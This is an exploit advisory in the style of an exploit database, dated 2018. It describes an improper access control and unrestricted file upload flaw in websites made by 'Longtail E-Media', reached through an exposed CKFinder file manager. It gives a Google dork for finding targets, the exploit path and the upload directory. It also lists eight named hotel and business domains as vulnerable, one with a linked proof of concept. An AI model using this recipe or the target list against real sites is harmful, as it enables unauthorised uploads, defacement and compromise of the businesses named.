#################################################################################################
# Exploit Title : Designed by Longtail E-Media Improper Access Control and Remote File Upload Vulnerability
# Author [ Discovered By ] : AYAR from Cyberizm Digital Security Army
# Date : 22/09/2018
# Vendor Homepage : longtail.info ~ facebook.com/longtail-e-media-127411177302444/
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-276 - [ Incorrect Default Permissions ] - CWE-284 - [ Improper Access Control ]
#################################################################################################
# Google Dork : intext:''Designed by Longtail E-media'' site:com
# Exploit : TARGET/assets/ckfinder/ckfinder.html
# Directory Path : /assets/userfiles/files/.....
#################################################################################################
# Example Vulnerable Sites =>
potalaguesthouse.com/assets/ckfinder/ckfinder.html => [ Proof of Concept ] => archive.is/XtNM0
dmrnepal.com/assets/ckfinder/ckfinder.html
peninsulanepal.com/assets/ckfinder/ckfinder.html
centerparkresort.com/assets/ckfinder/ckfinder.html
tukiresort.com/assets/ckfinder/ckfinder.html
barahi.com/assets/ckfinder/ckfinder.html
pokharachoiceinn.com/assets/ckfinder/ckfinder.html
shambalahotel.com/assets/ckfinder/ckfinder.html
#################################################################################################
# Discovered By AYAR from Cyberizm.Org Digital Security Team
#################################################################################################
# Thanks to Cyberizm Team => KingSkrupellos ~ H4CK4L ~ The_ZiziL
DARKDAYS ~ Leader Shawai ~ OrJiNaL ~ Stallk3r ~ Meczup ~ Dessy and other precious members.
#################################################################################################